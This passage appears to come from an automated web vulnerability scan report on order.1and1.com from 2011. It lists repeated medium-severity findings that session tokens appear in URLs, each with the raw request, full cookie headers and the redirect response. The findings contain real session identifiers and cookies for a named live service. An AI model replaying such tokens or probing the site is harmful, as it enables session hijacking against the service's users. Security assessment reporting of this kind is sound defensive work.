Date: Sun, 20 Mar 2011 18:45:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.15. http://order.1and1.com/xml/order/FeatureControlCenter

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureControlCenter

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureControlCenter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureControlCenter?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.16. http://order.1and1.com/xml/order/FeatureDatabaseAccess

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseAccess

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseAccess;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseAccess?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.17. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseDatabase;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseDatabase?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.18. http://order.1and1.com/xml/order/FeatureDatabaseMssql

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseMssql

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseMssql;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDatabaseMssql?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.19. http://order.1and1.com/xml/order/FeatureDomainDns

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDns

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainDns;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDns?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.20. http://order.1and1.com/xml/order/FeatureDomainDomains

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainDomains

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainDomains;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainDomains?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.21. http://order.1and1.com/xml/order/FeatureDomainPdr

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDomainPdr;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDomainPdr?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.22. http://order.1and1.com/xml/order/FeatureDreamweaver

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDreamweaver

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureDreamweaver?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.23. http://order.1and1.com/xml/order/FeatureEmailEmail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailEmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailEmail?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.24. http://order.1and1.com/xml/order/FeatureEmailVirusscan

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailVirusscan

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailVirusscan;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:25 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailVirusscan?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.25. http://order.1and1.com/xml/order/FeatureEmailWebmail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureEmailWebmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailWebmail?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.26. http://order.1and1.com/xml/order/FeatureFtpBackup

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureFtpBackup

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:49:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureFtpBackup?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.27. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:18 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.28. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:39 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.29. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrGoogleAdWords

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
